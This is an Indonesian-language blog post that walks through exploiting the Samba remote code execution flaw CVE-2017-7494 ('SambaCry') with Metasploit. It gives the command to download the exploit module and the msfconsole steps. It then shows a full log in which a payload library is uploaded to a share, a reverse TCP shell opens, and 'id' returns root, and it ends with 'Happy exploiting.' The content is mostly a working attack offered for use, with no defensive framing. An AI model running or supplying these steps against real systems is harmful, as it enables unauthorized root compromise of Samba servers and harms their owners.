Samba 3.5.0 – Remote Code Execution (CVE-2017-7494) Metasploit

Hmm sepertinya Remote Code Exploit juga menyerang Samba File Sharing di Linux nih? Akankah ada versi WannaCry Linux yang memanfaatkan celah ini? Atau harusnya diberi nama Sambacry?

wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /path/to/metasploit/modules/exploits/linux/samba/sambacry.rb

msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) >

Logs :

[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.151:445 - Using location 192.168.48.151shared for the path
[*] 192.168.48.151:445 - Payload is stored in //192.168.48.151/shared/ as nCiuzQVt.so
[*] 192.168.48.151:445 - Trying location /volume1/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /home/nCiuzQVt.so...
[*] Command shell session 2 opened (192.168.48.1:4444  -> 192.168.48.1:45072) at 2017-05-24 19:40:33 -0500
id
uid=0(root) gid=0(root) groups=0(root),100(users)

Kalau ada yang bingung silahkan tanya. Happy exploiting.
Shares

Leave a Reply